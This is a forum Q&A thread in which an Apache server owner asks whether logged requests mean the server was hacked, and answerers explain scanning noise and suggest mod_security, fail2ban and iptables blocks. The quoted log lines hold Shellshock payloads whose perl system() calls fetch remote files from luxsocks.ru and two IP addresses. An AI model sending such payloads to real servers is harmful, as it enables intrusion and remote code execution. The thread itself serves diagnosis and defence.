# Found error in apache access_log file

Tags: linux, apache

I've found the following error in the `access_log` file. Has my server been hacked or not, as I don't know why that IP address and logs appear on my server:

```
GET /cgi-bin/test.sh HTTP/1.1" 404 292 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate 

GET /w00tw00t.at.ISC.SANS.DFind:)
```

Comment: "GET HTTP/1.1 HTTP/1.1" 400 305 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://88.198.96.10/wget ; curl http://88.198.96.10/curl ; fetch http://88.198.96.10/fetch ; lwp-download http://88.198.96.10/lwp-download ; GET http://88.198.96.10/GET ; lynx http://88.198.96.10/lynx \");'"

Comment: "GET /cgi-bin/test.sh HTTP/1.1" 404 292 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"

Comment: "GET /cgi-bin/php5 HTTP/1.1" 404 289 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://88.198.96.10/wget ; curl http://88.198.96.10/curl ; fetch http://88.198.96.10/fetch ; lwp-download http://88.198.96.10/lwp-download ; GET http://88.198.96.10/GET ; lynx http://88.198.96.10/lynx \");'"

Comment: All above links saw in our apachi access logs why????

Comment: Kindly fixed that issue why it is happening on server how to resolve this OR stop this types of hits on my server

Comment: Please edit your question to include all the relevant information, rather than scattering it in comments. Thanks.

Comment: Actually today i am checking access_log and error_log of our apache server. And there found 404 error with above mentioned links which is not our links And I dont know how its come in our server But it is in access_log file..

Comment: And what is the meaning of this logs links And what is the http://luxsocks.ru links

Answer (score 0):

Probably you were not hacked. But it is a good idea to check your server for any signs of hacking attempt (both root and non-root like modified files in webroot).

In the first line, they tried to access file `/cgi-bin/test.sh` which probably doesn't exist on your servers (http error code 404, which could have been returned by apache itself when file is not found; or it could have been returned also by the cgi-script, but I doubt that).

The rest of that line (including wget) is the `Referer` http header. I don't know exact reason why to put exploit code there, but it can be executed for example by badly written logfile analyzers. That is also reason why spammers put there links to their websites. Here it seems like the content of the Referer header should have been input of the script itself, but for some reason wasn't.

Comment: So how to fix that issue And how to block that type of hits.

Comment: It's not an issue on your servers, they are just trying to find servers where it will work. If you are paranoid, you can try to catch such attempts with apache's `mod_security`, maybe combined with `fail2ban` rules to automatically block each IP which is trying too hard.

Answer (score 0):

I'd say it's part of the internet static noise. The WGET and similar are requests to make your machine fetch something - perhaps someone tries to use you as a proxy?

You can't do much about it, you can block this ip provider on iptables, but it won't stop another such attempt using different IP.

1. Get the IP range of the violating provider:

   whois 88.198.96.10

You will get something including 88.198.96.0 - 88.198.96.31 - this is the IP range you don't want to access.

2. Update IPtables:

   iptables -A INPUT -m iprange --src-range 88.198.96.0-88.198.96.31 -j DROP
   iptables -A OUTPUT -m iprange --dst-range 88.198.96.0-88.198.96.31 -j DROP

This way you will block the entire ISP range for 88.198.xxxxx both in and out.

3. Do the same for all other IP addresses that waste your bandwidth and spoil your logs.

**Remember to only block range that you are not delivering any services!** The two lines will indistinctively block every and all communication with this ISP. Also, remember that the -A parameter appends to the end of rule chain, so if you have a rule that would allow explicitly this IP range or part of it, adjust accordingly.